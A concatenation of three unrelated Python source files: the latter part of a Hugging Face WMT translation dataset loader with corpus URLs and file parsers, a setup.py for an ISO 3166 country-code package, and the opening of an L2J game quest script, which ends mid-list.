manual_dl_files=["data-plaintext-format.%d.tar" % i for i in range(10)],
# Each tar contains multiple files, which we process specially in
# _parse_czeng.
path=("data.plaintext-format/??train.gz",) * 10,
),
SubDataset(
name="dcep_v1",
target="en",
sources={"lv"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/dcep.lv-en.v1.tgz",
path=("dcep.en-lv/dcep.lv", "dcep.en-lv/dcep.en"),
),
SubDataset(
name="europarl_v7",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt13/resolve/main/training-parallel-europarl-v7.tgz",
path=("training/europarl-v7.{src}-en.{src}", "training/europarl-v7.{src}-en.en"),
),
SubDataset(
name="europarl_v7_frde",
target="de",
sources={"fr"},
url=(
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/europarl-v7.fr.gz",
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/europarl-v7.de.gz",
),
path=("", ""),
),
SubDataset(
name="europarl_v8_18",
target="en",
sources={"et", "fi"},
url="https://huggingface.co/datasets/wmt/wmt18/resolve/main/translation-task/training-parallel-ep-v8.tgz",
path=("training/europarl-v8.{src}-en.{src}", "training/europarl-v8.{src}-en.en"),
),
SubDataset(
name="europarl_v8_16",
target="en",
sources={"fi", "ro"},
url="https://huggingface.co/datasets/wmt/wmt16/resolve/main/translation-task/training-parallel-ep-v8.tgz",
path=("training-parallel-ep-v8/europarl-v8.{src}-en.{src}", "training-parallel-ep-v8/europarl-v8.{src}-en.en"),
),
SubDataset(
name="europarl_v9",
target="en",
sources={"cs", "de", "fi", "lt"},
url="https://huggingface.co/datasets/wmt/europarl/resolve/main/v9/training/europarl-v9.{src}-en.tsv.gz",
path="",
),
SubDataset(
name="gigafren",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt10/resolve/main/training-giga-fren.tar",
path=("giga-fren.release2.fixed.fr.gz", "giga-fren.release2.fixed.en.gz"),
),
SubDataset(
name="hindencorp_01",
target="en",
sources={"hi"},
url="http://ufallab.ms.mff.cuni.cz/~bojar/hindencorp",
manual_dl_files=["hindencorp0.1.gz"],
path="",
),
SubDataset(
name="leta_v1",
target="en",
sources={"lv"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/leta.v1.tgz",
path=("LETA-lv-en/leta.lv", "LETA-lv-en/leta.en"),
),
SubDataset(
name="multiun",
target="en",
sources={"es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt13/resolve/main/training-parallel-un.tgz",
path=("un/undoc.2000.{src}-en.{src}", "un/undoc.2000.{src}-en.en"),
),
SubDataset(
name="newscommentary_v9",
target="en",
sources={"cs", "de", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt14/resolve/main/training-parallel-nc-v9.tgz",
path=("training/news-commentary-v9.{src}-en.{src}", "training/news-commentary-v9.{src}-en.en"),
),
SubDataset(
name="newscommentary_v10",
target="en",
sources={"cs", "de", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt15/resolve/main/training-parallel-nc-v10.tgz",
path=("news-commentary-v10.{src}-en.{src}", "news-commentary-v10.{src}-en.en"),
),
SubDataset(
name="newscommentary_v11",
target="en",
sources={"cs", "de", "ru"},
url="https://huggingface.co/datasets/wmt/wmt16/resolve/main/translation-task/training-parallel-nc-v11.tgz",
path=(
"training-parallel-nc-v11/news-commentary-v11.{src}-en.{src}",
"training-parallel-nc-v11/news-commentary-v11.{src}-en.en",
),
),
SubDataset(
name="newscommentary_v12",
target="en",
sources={"cs", "de", "ru", "zh"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/training-parallel-nc-v12.tgz",
path=("training/news-commentary-v12.{src}-en.{src}", "training/news-commentary-v12.{src}-en.en"),
),
SubDataset(
name="newscommentary_v13",
target="en",
sources={"cs", "de", "ru", "zh"},
url="https://huggingface.co/datasets/wmt/wmt18/resolve/main/translation-task/training-parallel-nc-v13.tgz",
path=(
"training-parallel-nc-v13/news-commentary-v13.{src}-en.{src}",
"training-parallel-nc-v13/news-commentary-v13.{src}-en.en",
),
),
SubDataset(
name="newscommentary_v14",
target="en", # fr-de pair in newscommentary_v14_frde
sources={"cs", "de", "kk", "ru", "zh"},
url="http://data.statmt.org/news-commentary/v14/training/news-commentary-v14.{0}-{1}.tsv.gz",
path="",
),
SubDataset(
name="newscommentary_v14_frde",
target="de",
sources={"fr"},
url="http://data.statmt.org/news-commentary/v14/training/news-commentary-v14.de-fr.tsv.gz",
path="",
),
SubDataset(
name="onlinebooks_v1",
target="en",
sources={"lv"},
url="https://huggingface.co/datasets/wmt/wmt17/resolve/main/translation-task/books.lv-en.v1.tgz",
path=("farewell/farewell.lv", "farewell/farewell.en"),
),
SubDataset(
name="paracrawl_v1",
target="en",
sources={"cs", "de", "et", "fi", "ru"},
url="https://s3.amazonaws.com/web-language-models/paracrawl/release1/paracrawl-release1.en-{src}.zipporah0-dedup-clean.tgz",
path=(
"paracrawl-release1.en-{src}.zipporah0-dedup-clean.{src}",
"paracrawl-release1.en-{src}.zipporah0-dedup-clean.en",
),
),
SubDataset(
name="paracrawl_v1_ru",
target="en",
sources={"ru"},
url="https://s3.amazonaws.com/web-language-models/paracrawl/release1/paracrawl-release1.en-ru.zipporah0-dedup-clean.tgz",
path=(
"paracrawl-release1.en-ru.zipporah0-dedup-clean.ru",
"paracrawl-release1.en-ru.zipporah0-dedup-clean.en",
),
),
SubDataset(
name="paracrawl_v3",
target="en", # fr-de pair in paracrawl_v3_frde
sources={"cs", "de", "fi", "lt"},
url="https://s3.amazonaws.com/web-language-models/paracrawl/release3/en-{src}.bicleaner07.tmx.gz",
path="",
),
SubDataset(
name="paracrawl_v3_frde",
target="de",
sources={"fr"},
url=(
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/de-fr.bicleaner07.de.gz",
"https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/fr-de/bitexts/de-fr.bicleaner07.fr.gz",
),
path=("", ""),
),
SubDataset(
name="rapid_2016",
target="en",
sources={"de", "et", "fi"},
url="https://huggingface.co/datasets/wmt/wmt18/resolve/main/translation-task/rapid2016.tgz",
path=("rapid2016.{0}-{1}.{src}", "rapid2016.{0}-{1}.en"),
),
SubDataset(
name="rapid_2016_ltfi",
target="en",
sources={"fi", "lt"},
url="https://tilde-model.s3-eu-west-1.amazonaws.com/rapid2016.en-{src}.tmx.zip",
path="rapid2016.en-{src}.tmx",
),
SubDataset(
name="rapid_2019",
target="en",
sources={"de"},
url="https://s3-eu-west-1.amazonaws.com/tilde-model/rapid2019.de-en.zip",
path=("rapid2019.de-en.de", "rapid2019.de-en.en"),
),
SubDataset(
name="setimes_2",
target="en",
sources={"ro", "tr"},
url="https://opus.nlpl.eu/download.php?f=SETIMES/v2/tmx/en-{src}.tmx.gz",
path="",
),
SubDataset(
name="uncorpus_v1",
target="en",
sources={"ru", "zh"},
url="https://huggingface.co/datasets/wmt/uncorpus/resolve/main/UNv1.0.en-{src}.tar.gz",
path=("en-{src}/UNv1.0.en-{src}.{src}", "en-{src}/UNv1.0.en-{src}.en"),
),
SubDataset(
name="wikiheadlines_fi",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt15/resolve/main/wiki-titles.tgz",
path="wiki/fi-en/titles.fi-en",
),
SubDataset(
name="wikiheadlines_hi",
target="en",
sources={"hi"},
url="https://huggingface.co/datasets/wmt/wmt14/resolve/main/wiki-titles.tgz",
path="wiki/hi-en/wiki-titles.hi-en",
),
SubDataset(
# Verified that wmt14 and wmt15 files are identical.
name="wikiheadlines_ru",
target="en",
sources={"ru"},
url="https://huggingface.co/datasets/wmt/wmt15/resolve/main/wiki-titles.tgz",
path="wiki/ru-en/wiki.ru-en",
),
SubDataset(
name="wikititles_v1",
target="en",
sources={"cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"},
url="https://huggingface.co/datasets/wmt/wikititles/resolve/main/v1/wikititles-v1.{src}-en.tsv.gz",
path="",
),
SubDataset(
name="yandexcorpus",
target="en",
sources={"ru"},
url="https://translate.yandex.ru/corpus?lang=en",
manual_dl_files=["1mcorpus.zip"],
path=("corpus.en_ru.1m.ru", "corpus.en_ru.1m.en"),
),
# pylint:enable=line-too-long
] + [
SubDataset( # pylint:disable=g-complex-comprehension
name=ss,
target="en",
sources={"zh"},
url="ftp://cwmt-wmt:[email protected]/parallel/%s.zip" % ss,
path=("%s/*_c[hn].txt" % ss, "%s/*_en.txt" % ss),
)
for ss in CWMT_SUBSET_NAMES
]
_DEV_SUBSETS = [
SubDataset(
name="euelections_dev2019",
target="de",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/euelections_dev2019.fr-de.src.fr", "dev/euelections_dev2019.fr-de.tgt.de"),
),
SubDataset(
name="newsdev2014",
target="en",
sources={"hi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2014.hi", "dev/newsdev2014.en"),
),
SubDataset(
name="newsdev2015",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2015-fien-src.{src}.sgm", "dev/newsdev2015-fien-ref.en.sgm"),
),
SubDataset(
name="newsdiscussdev2015",
target="en",
sources={"ro", "tr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscussdev2015-{src}en-src.{src}.sgm", "dev/newsdiscussdev2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2016",
target="en",
sources={"ro", "tr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2016-{src}en-src.{src}.sgm", "dev/newsdev2016-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2017",
target="en",
sources={"lv", "zh"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2017-{src}en-src.{src}.sgm", "dev/newsdev2017-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2018",
target="en",
sources={"et"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2018-{src}en-src.{src}.sgm", "dev/newsdev2018-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdev2019",
target="en",
sources={"gu", "kk", "lt"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdev2019-{src}en-src.{src}.sgm", "dev/newsdev2019-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdiscussdev2015",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscussdev2015-{src}en-src.{src}.sgm", "dev/newsdiscussdev2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdiscusstest2015",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscusstest2015-{src}en-src.{src}.sgm", "dev/newsdiscusstest2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newssyscomb2009",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newssyscomb2009.{src}", "dev/newssyscomb2009.en"),
),
SubDataset(
name="newstest2008",
target="en",
sources={"cs", "de", "es", "fr", "hu"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/news-test2008.{src}", "dev/news-test2008.en"),
),
SubDataset(
name="newstest2009",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2009.{src}", "dev/newstest2009.en"),
),
SubDataset(
name="newstest2010",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2010.{src}", "dev/newstest2010.en"),
),
SubDataset(
name="newstest2011",
target="en",
sources={"cs", "de", "es", "fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2011.{src}", "dev/newstest2011.en"),
),
SubDataset(
name="newstest2012",
target="en",
sources={"cs", "de", "es", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2012.{src}", "dev/newstest2012.en"),
),
SubDataset(
name="newstest2013",
target="en",
sources={"cs", "de", "es", "fr", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2013.{src}", "dev/newstest2013.en"),
),
SubDataset(
name="newstest2014",
target="en",
sources={"cs", "de", "es", "fr", "hi", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2014-{src}en-src.{src}.sgm", "dev/newstest2014-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstest2015",
target="en",
sources={"cs", "de", "fi", "ru"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2015-{src}en-src.{src}.sgm", "dev/newstest2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newsdiscusstest2015",
target="en",
sources={"fr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newsdiscusstest2015-{src}en-src.{src}.sgm", "dev/newsdiscusstest2015-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstest2016",
target="en",
sources={"cs", "de", "fi", "ro", "ru", "tr"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2016-{src}en-src.{src}.sgm", "dev/newstest2016-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstestB2016",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstestB2016-enfi-ref.{src}.sgm", "dev/newstestB2016-enfi-src.en.sgm"),
),
SubDataset(
name="newstest2017",
target="en",
sources={"cs", "de", "fi", "lv", "ru", "tr", "zh"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2017-{src}en-src.{src}.sgm", "dev/newstest2017-{src}en-ref.en.sgm"),
),
SubDataset(
name="newstestB2017",
target="en",
sources={"fi"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstestB2017-fien-src.fi.sgm", "dev/newstestB2017-fien-ref.en.sgm"),
),
SubDataset(
name="newstest2018",
target="en",
sources={"cs", "de", "et", "fi", "ru", "tr", "zh"},
url="https://huggingface.co/datasets/wmt/wmt19/resolve/main/translation-task/dev.tgz",
path=("dev/newstest2018-{src}en-src.{src}.sgm", "dev/newstest2018-{src}en-ref.en.sgm"),
),
]
DATASET_MAP = {dataset.name: dataset for dataset in _TRAIN_SUBSETS + _DEV_SUBSETS}
_CZENG17_FILTER = SubDataset(
name="czeng17_filter",
target="en",
sources={"cs"},
url="http://ufal.mff.cuni.cz/czeng/download.php?f=convert_czeng16_to_17.pl.zip",
path="convert_czeng16_to_17.pl",
)
class WmtConfig(datasets.BuilderConfig):
"""BuilderConfig for WMT."""
def __init__(self, url=None, citation=None, description=None, language_pair=(None, None), subsets=None, **kwargs):
"""BuilderConfig for WMT.
Args:
url: The reference URL for the dataset.
citation: The paper citation for the dataset.
description: The description of the dataset.
language_pair: pair of languages that will be used for translation. Should
contain 2 letter coded strings. For example: ("en", "de").
configuration for the `datasets.features.text.TextEncoder` used for the
`datasets.features.text.Translation` features.
subsets: Dict[split, list[str]]. List of the subset to use for each of the
split. Note that WMT subclasses overwrite this parameter.
**kwargs: keyword arguments forwarded to super.
"""
name = "%s-%s" % (language_pair[0], language_pair[1])
if "name" in kwargs: # Add name suffix for custom configs
name += "." + kwargs.pop("name")
super(WmtConfig, self).__init__(name=name, description=description, **kwargs)
self.url = url or "http://www.statmt.org"
self.citation = citation
self.language_pair = language_pair
self.subsets = subsets
# TODO(PVP): remove when manual dir works
# +++++++++++++++++++++
if language_pair[1] in ["cs", "hi", "ru"]:
assert NotImplementedError(
"The dataset for {}-en is currently not fully supported.".format(language_pair[1])
)
# +++++++++++++++++++++
class Wmt(ABC, datasets.GeneratorBasedBuilder):
"""WMT translation dataset."""
def __init__(self, *args, **kwargs):
if type(self) == Wmt and "config" not in kwargs: # pylint: disable=unidiomatic-typecheck
raise ValueError(
"The raw `wmt_translate` can only be instantiated with the config "
"kwargs. You may want to use one of the `wmtYY_translate` "
"implementation instead to get the WMT dataset for a specific year."
)
super(Wmt, self).__init__(*args, **kwargs)
@property
@abstractmethod
def _subsets(self):
"""Subsets that make up each split of the dataset."""
raise NotImplementedError("This is a abstract method")
@property
def subsets(self):
"""Subsets that make up each split of the dataset for the language pair."""
source, target = self.config.language_pair
filtered_subsets = {}
for split, ss_names in self._subsets.items():
filtered_subsets[split] = []
for ss_name in ss_names:
dataset = DATASET_MAP[ss_name]
if dataset.target != target or source not in dataset.sources:
logger.info("Skipping sub-dataset that does not include language pair: %s", ss_name)
else:
filtered_subsets[split].append(ss_name)
logger.info("Using sub-datasets: %s", filtered_subsets)
return filtered_subsets
def _info(self):
src, target = self.config.language_pair
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{"translation": datasets.features.Translation(languages=self.config.language_pair)}
),
supervised_keys=(src, target),
homepage=self.config.url,
citation=self.config.citation,
)
def _vocab_text_gen(self, split_subsets, extraction_map, language):
for _, ex in self._generate_examples(split_subsets, extraction_map, with_translation=False):
yield ex[language]
def _split_generators(self, dl_manager):
source, _ = self.config.language_pair
manual_paths_dict = {}
urls_to_download = {}
for ss_name in itertools.chain.from_iterable(self.subsets.values()):
if ss_name == "czeng_17":
# CzEng1.7 is CzEng1.6 with some blocks filtered out. We must download
# the filtering script so we can parse out which blocks need to be
# removed.
urls_to_download[_CZENG17_FILTER.name] = _CZENG17_FILTER.get_url(source)
# get dataset
dataset = DATASET_MAP[ss_name]
if dataset.get_manual_dl_files(source):
# TODO(PVP): following two lines skip configs that are incomplete for now
# +++++++++++++++++++++
logger.info("Skipping {} for now. Incomplete dataset for {}".format(dataset.name, self.config.name))
continue
# +++++++++++++++++++++
manual_dl_files = dataset.get_manual_dl_files(source)
manual_paths = [
os.path.join(os.path.abspath(os.path.expanduser(dl_manager.manual_dir)), fname)
for fname in manual_dl_files
]
assert all(
os.path.exists(path) for path in manual_paths
), "For {0}, you must manually download the following file(s) from {1} and place them in {2}: {3}".format(
dataset.name, dataset.get_url(source), dl_manager.manual_dir, ", ".join(manual_dl_files)
)
# set manual path for correct subset
manual_paths_dict[ss_name] = manual_paths
else:
urls_to_download[ss_name] = dataset.get_url(source)
# Download and extract files from URLs.
downloaded_files = dl_manager.download_and_extract(urls_to_download)
# Extract manually downloaded files.
manual_files = dl_manager.extract(manual_paths_dict)
extraction_map = dict(downloaded_files, **manual_files)
for language in self.config.language_pair:
self._vocab_text_gen(self.subsets[datasets.Split.TRAIN], extraction_map, language)
return [
datasets.SplitGenerator( # pylint:disable=g-complex-comprehension
name=split, gen_kwargs={"split_subsets": split_subsets, "extraction_map": extraction_map}
)
for split, split_subsets in self.subsets.items()
]
def _generate_examples(self, split_subsets, extraction_map, with_translation=True):
"""Returns the examples in the raw (text) form."""
source, _ = self.config.language_pair
def _get_local_paths(dataset, extract_dirs):
rel_paths = dataset.get_path(source)
if len(extract_dirs) == 1:
extract_dirs = extract_dirs * len(rel_paths)
return [
os.path.join(ex_dir, rel_path) if rel_path else ex_dir
for ex_dir, rel_path in zip(extract_dirs, rel_paths)
]
for ss_name in split_subsets:
# TODO(PVP) remove following five lines when manual data works
# +++++++++++++++++++++
dataset = DATASET_MAP[ss_name]
source, _ = self.config.language_pair
if dataset.get_manual_dl_files(source):
logger.info("Skipping {} for now. Incomplete dataset for {}".format(dataset.name, self.config.name))
continue
# +++++++++++++++++++++
logger.info("Generating examples from: %s", ss_name)
dataset = DATASET_MAP[ss_name]
extract_dirs = extraction_map[ss_name]
files = _get_local_paths(dataset, extract_dirs)
if ss_name.startswith("czeng"):
if ss_name.endswith("16pre"):
sub_generator = functools.partial(_parse_tsv, language_pair=("en", "cs"))
elif ss_name.endswith("17"):
filter_path = _get_local_paths(_CZENG17_FILTER, extraction_map[_CZENG17_FILTER.name])[0]
sub_generator = functools.partial(_parse_czeng, filter_path=filter_path)
else:
sub_generator = _parse_czeng
elif ss_name == "hindencorp_01":
sub_generator = _parse_hindencorp
elif len(files) == 2:
if ss_name.endswith("_frde"):
sub_generator = _parse_frde_bitext
else:
sub_generator = _parse_parallel_sentences
elif len(files) == 1:
fname = files[0]
# Note: Due to formatting used by `download_manager`, the file
# extension may not be at the end of the file path.
if ".tsv" in fname:
sub_generator = _parse_tsv
elif (
ss_name.startswith("newscommentary_v14")
or ss_name.startswith("europarl_v9")
or ss_name.startswith("wikititles_v1")
):
sub_generator = functools.partial(_parse_tsv, language_pair=self.config.language_pair)
elif "tmx" in fname or ss_name.startswith("paracrawl_v3"):
sub_generator = _parse_tmx
elif ss_name.startswith("wikiheadlines"):
sub_generator = _parse_wikiheadlines
else:
raise ValueError("Unsupported file format: %s" % fname)
else:
raise ValueError("Invalid number of files: %d" % len(files))
for sub_key, ex in sub_generator(*files):
if not all(ex.values()):
continue
# TODO(adarob): Add subset feature.
# ex["subset"] = subset
key = "{}/{}".format(ss_name, sub_key)
if with_translation is True:
ex = {"translation": ex}
yield key, ex
def _parse_parallel_sentences(f1, f2):
"""Returns examples from parallel SGML or text files, which may be gzipped."""
def _parse_text(path):
"""Returns the sentences from a single text file, which may be gzipped."""
split_path = path.split(".")
if split_path[-1] == "gz":
lang = split_path[-2]
with open(path, "rb") as f, gzip.GzipFile(fileobj=f) as g:
return g.read().decode("utf-8").split("\n"), lang
if split_path[-1] == "txt":
# CWMT
lang = split_path[-2].split("_")[-1]
lang = "zh" if lang in ("ch", "cn") else lang
else:
lang = split_path[-1]
with open(path, "rb") as f:
return f.read().decode("utf-8").split("\n"), lang
def _parse_sgm(path):
"""Returns sentences from a single SGML file."""
lang = path.split(".")[-2]
sentences = []
# Note: We can't use the XML parser since some of the files are badly
# formatted.
seg_re = re.compile(r"<seg id=\"\d+\">(.*)</seg>")
with open(path, encoding="utf-8") as f:
for line in f:
seg_match = re.match(seg_re, line)
if seg_match:
assert len(seg_match.groups()) == 1
sentences.append(seg_match.groups()[0])
return sentences, lang
parse_file = _parse_sgm if f1.endswith(".sgm") else _parse_text
# Some datasets (e.g., CWMT) contain multiple parallel files specified with
# a wildcard. We sort both sets to align them and parse them one by one.
f1_files = sorted(glob.glob(f1))
f2_files = sorted(glob.glob(f2))
assert f1_files and f2_files, "No matching files found: %s, %s." % (f1, f2)
assert len(f1_files) == len(f2_files), "Number of files do not match: %d vs %d for %s vs %s." % (
len(f1_files),
len(f2_files),
f1,
f2,
)
for f_id, (f1_i, f2_i) in enumerate(zip(sorted(f1_files), sorted(f2_files))):
l1_sentences, l1 = parse_file(f1_i)
l2_sentences, l2 = parse_file(f2_i)
assert len(l1_sentences) == len(l2_sentences), "Sizes do not match: %d vs %d for %s vs %s." % (
len(l1_sentences),
len(l2_sentences),
f1_i,
f2_i,
)
for line_id, (s1, s2) in enumerate(zip(l1_sentences, l2_sentences)):
key = "{}/{}".format(f_id, line_id)
yield key, {l1: s1, l2: s2}
def _parse_frde_bitext(fr_path, de_path):
with open(fr_path, encoding="utf-8") as f:
fr_sentences = f.read().split("\n")
with open(de_path, encoding="utf-8") as f:
de_sentences = f.read().split("\n")
assert len(fr_sentences) == len(de_sentences), "Sizes do not match: %d vs %d for %s vs %s." % (
len(fr_sentences),
len(de_sentences),
fr_path,
de_path,
)
for line_id, (s1, s2) in enumerate(zip(fr_sentences, de_sentences)):
yield line_id, {"fr": s1, "de": s2}
def _parse_tmx(path):
"""Generates examples from TMX file."""
def _get_tuv_lang(tuv):
for k, v in tuv.items():
if k.endswith("}lang"):
return v
raise AssertionError("Language not found in `tuv` attributes.")
def _get_tuv_seg(tuv):
segs = tuv.findall("seg")
assert len(segs) == 1, "Invalid number of segments: %d" % len(segs)
return segs[0].text
with open(path, "rb") as f:
# Workaround due to: https://github.com/tensorflow/tensorflow/issues/33563
utf_f = codecs.getreader("utf-8")(f)
for line_id, (_, elem) in enumerate(ElementTree.iterparse(utf_f)):
if elem.tag == "tu":
yield line_id, {_get_tuv_lang(tuv): _get_tuv_seg(tuv) for tuv in elem.iterfind("tuv")}
elem.clear()
def _parse_tsv(path, language_pair=None):
"""Generates examples from TSV file."""
if language_pair is None:
lang_match = re.match(r".*\.([a-z][a-z])-([a-z][a-z])\.tsv", path)
assert lang_match is not None, "Invalid TSV filename: %s" % path
l1, l2 = lang_match.groups()
else:
l1, l2 = language_pair
with open(path, encoding="utf-8") as f:
for j, line in enumerate(f):
cols = line.split("\t")
if len(cols) != 2:
logger.warning("Skipping line %d in TSV (%s) with %d != 2 columns.", j, path, len(cols))
continue
s1, s2 = cols
yield j, {l1: s1.strip(), l2: s2.strip()}
def _parse_wikiheadlines(path):
"""Generates examples from Wikiheadlines dataset file."""
lang_match = re.match(r".*\.([a-z][a-z])-([a-z][a-z])$", path)
assert lang_match is not None, "Invalid Wikiheadlines filename: %s" % path
l1, l2 = lang_match.groups()
with open(path, encoding="utf-8") as f:
for line_id, line in enumerate(f):
s1, s2 = line.split("|||")
yield line_id, {l1: s1.strip(), l2: s2.strip()}
def _parse_czeng(*paths, **kwargs):
"""Generates examples from CzEng v1.6, with optional filtering for v1.7."""
filter_path = kwargs.get("filter_path", None)
if filter_path:
re_block = re.compile(r"^[^-]+-b(\d+)-\d\d[tde]")
with open(filter_path, encoding="utf-8") as f:
bad_blocks = {blk for blk in re.search(r"qw{([\s\d]*)}", f.read()).groups()[0].split()}
logger.info("Loaded %d bad blocks to filter from CzEng v1.6 to make v1.7.", len(bad_blocks))
for path in paths:
for gz_path in sorted(glob.glob(path)):
with open(gz_path, "rb") as g, gzip.GzipFile(fileobj=g) as f:
filename = os.path.basename(gz_path)
for line_id, line in enumerate(f):
line = line.decode("utf-8") # required for py3
if not line.strip():
continue
id_, unused_score, cs, en = line.split("\t")
if filter_path:
block_match = re.match(re_block, id_)
if block_match and block_match.groups()[0] in bad_blocks:
continue
sub_key = "{}/{}".format(filename, line_id)
yield sub_key, {
"cs": cs.strip(),
"en": en.strip(),
}
def _parse_hindencorp(path):
with open(path, encoding="utf-8") as f:
for line_id, line in enumerate(f):
split_line = line.split("\t")
if len(split_line) != 5:
logger.warning("Skipping invalid HindEnCorp line: %s", line)
continue
yield line_id, {"translation": {"en": split_line[3].strip(), "hi": split_line[4].strip()}}
|
py | 1a40d542ac385a2993eb09328a88f13ea6070647 | import os.path
try:
from setuptools import setup, find_packages
except ImportError:
from ez_setup import use_setuptools
use_setuptools()
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(name='wp_iso3166',
version="0.1",
author="original author, Mike Spindel",
author_email="-",
license="MIT",
keywords="iso 3166-1 country codes WorldPop",
url="https://github.com/vesnikos/wp_iso3166",
description='Self-contained ISO 3166-1 country definitions.',
packages=find_packages(exclude=['ez_setup']),
long_description=read('README.rst'),
zip_safe=False,
classifiers=[
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Natural Language :: English",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
])
|
py | 1a40d589087f8573e3687d249264e749663c5d9a | # Rewritten by RayzoR
import sys
from com.l2jfrozen.gameserver.model.quest import State
from com.l2jfrozen.gameserver.model.quest import QuestState
from com.l2jfrozen.gameserver.model.quest.jython import QuestJython as JQuest
from com.l2jfrozen.gameserver.model.base import Race
qn = "236_SeedsOfChaos"
DROP_RATE = 20
#prerequisites:
STAR_OF_DESTINY = 5011
#Quest items
BLACK_ECHO_CRYSTAL = 9745
SHINING_MEDALLION = 9743
#How many of each do you need?
NEEDED = {
BLACK_ECHO_CRYSTAL: 1,
SHINING_MEDALLION: 62
}
SCROLL_ENCHANT_WEAPON_A = 729
#NPCs
KEKROPUS,WIZARD,KATENAR,ROCK,HARKILGAMED,MAO,RODENPICULA,NORNIL = 32138,31522,32235,32238,32334,32190,32237,32239
#Mobs
NEEDLE_STAKATO_DRONE = [21516,21517]
SPLENDOR_MOBS = [21520,21521,21522,21523,21524,21525,21526,21527,21528,21529,21530,21531,21532,21533,21534,21535,21536,21537,21538,21539,21540,21541]
#Mobs, cond, Drop
DROPLIST = {
#Needle Stakato Drones
21516: [2,BLACK_ECHO_CRYSTAL],
21517: [2,BLACK_ECHO_CRYSTAL],
#Splendor Mobs
21520: [12,SHINING_MEDALLION],
21521: [12,SHINING_MEDALLION],
21522: [12,SHINING_MEDALLION],
21523: [12,SHINING_MEDALLION],
21524: [12,SHINING_MEDALLION],
21525: [12,SHINING_MEDALLION],
21526: [12,SHINING_MEDALLION],
21527: [12,SHINING_MEDALLION],
21528: [12,SHINING_MEDALLION],
21529: [12,SHINING_MEDALLION],
21530: [12,SHINING_MEDALLION],
21531: [12,SHINING_MEDALLION],
21532: [12,SHINING_MEDALLION],
21533: [12,SHINING_MEDALLION],
21534: [12,SHINING_MEDALLION],
